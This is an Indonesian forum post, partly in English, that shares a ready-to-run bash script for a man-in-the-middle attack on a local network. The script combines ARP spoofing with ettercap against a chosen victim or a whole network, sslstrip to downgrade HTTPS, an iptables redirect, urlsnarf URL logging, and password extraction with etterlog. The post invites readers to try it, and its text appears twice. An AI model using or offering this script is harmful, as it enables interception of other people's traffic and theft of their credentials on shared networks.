08-02-2011, 12:36 PM
Jalan - jalan pas liburan puasa
Nemu script yang kayaknya lumayan berguna....
First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:
This is because i use ettercap to do the arpspoofing, but i dont want it to do the fake certificate thing (we have sslstrip to do the job).
Lalu, ini dia scriptnya...
Save dengan ekstensi .sh ya.. Lalu mark as executable...
Silakan dicoba
Sumber : http://ipsite.org/12c1
Nemu script yang kayaknya lumayan berguna....
First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:
Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
This is because i use ettercap to do the arpspoofing, but i dont want it to do the fake certificate thing (we have sslstrip to do the job).
Lalu, ini dia scriptnya...
Save dengan ekstensi .sh ya.. Lalu mark as executable...
Code:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
Silakan dicoba
Sumber : http://ipsite.org/12c1